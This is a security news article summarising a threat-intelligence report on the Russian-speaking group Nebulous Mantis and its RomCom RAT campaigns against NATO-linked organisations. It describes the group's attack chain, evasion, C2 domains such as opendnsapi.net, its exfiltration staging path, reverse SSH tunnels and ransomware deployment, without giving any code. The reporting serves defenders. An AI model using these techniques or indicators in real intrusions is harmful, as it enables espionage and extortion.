Russia-linked Group Nebulous Mantis Targets NATO-Related Defense Organizations
A recent report by PRODAFT researchers has shed light on a sophisticated Russian-speaking cyber espionage group known as Nebulous Mantis, also referred to as Cuba, STORM-0978, Tropical Scorpius, and UNC2596. This group has been targeting critical infrastructure, governments, and NATO-linked entities since 2019, using advanced techniques to evade detection and maintain persistence.
Nebulous Mantis utilizes two primary tools: RomCom RAT (Remote Access Trojan) and Hancitor, which have been used in spear-phishing campaigns for espionage, lateral movement, and data theft since mid-2022. The RAT supports advanced evasion techniques, including living-off-the-land (LOTL) tactics and encrypted command and control (C2) communications.
One of the striking features of Nebulous Mantis is its continuous evolution of C2 infrastructure, relying on bulletproof hosting services like LuxHost and AEZA to maintain persistence and evade detection. The group's domain names change every month, making it challenging for security professionals to track their activities.
The Role of LARVA-290 in Nebulous Mantis
Analysis of the team's infrastructures reveals that LARVA-290, an individual who obtained intrusion servers for and conducted numerous ransomware attacks, continues to play a critical IT admin role within the Nebulous Mantis team and in RomCom attacks. This suggests a high level of organization and coordination among the group members.
Malicious Campaigns and Tactics
Nebulous Mantis imitates trusted services like OneDrive to trick victims into downloading infected files, often hosted on Mediafire. Their campaigns involve multi-phase intrusions, initial access, privilege escalation, and data exfiltration, using modular malware, LOTL techniques, and evasive C2 infrastructure.
The group's attacks follow a post-infection phase, where a fake PDF triggers an EXE that checks for sandbox evasion markers before downloading further payloads like Keyprov.dll. It then loads RomCom's first-stage backdoor, contacts C2 servers (e.g., opendnsapi.net), and uses IPFS to retrieve encrypted modules.
Tools like WinRAR and Plink are deployed, with data exfiltrated from c:\users\public\music. The malicious code maintains persistence through registry manipulation.
Ransomware Attacks
Nebulous Mantis uses RomCom malware for stealthy attacks involving system profiling, credential harvesting, and AD/domain enumeration. Attackers used tools like renamed Sysinternals and WinRAR for lateral movement and data staging.
The operators use a C2 panel to manage infected hosts and modules, and issue commands. The attackers used reverse SSH tunnels to ensure persistence.
Data Theft and Ransomware Demands
Following all these attack stages, the Nebulous Mantis team gathers all critical information from the victim machine and uploads it to their C2 servers. Subsequently, they deploy ransomware onto the machine, encrypting all the data and demanding a ransom (T1486 – Data Encrypted for Impact).
Conclusion
Experts conclude that RomCom poses a major cyber threat due to its technical sophistication, strong operational security, and targeted attacks on critical organizations—indicating risks that go far beyond typical financially driven cybercrime.
"Throughout the attack lifecycle, Nebulous Mantis exhibits operational discipline in minimizing their footprint, carefully balancing aggressive intelligence collection with stealth requirements," says the report. "This suggests either state-sponsored backing or a professional cybercriminal organization with significant resources."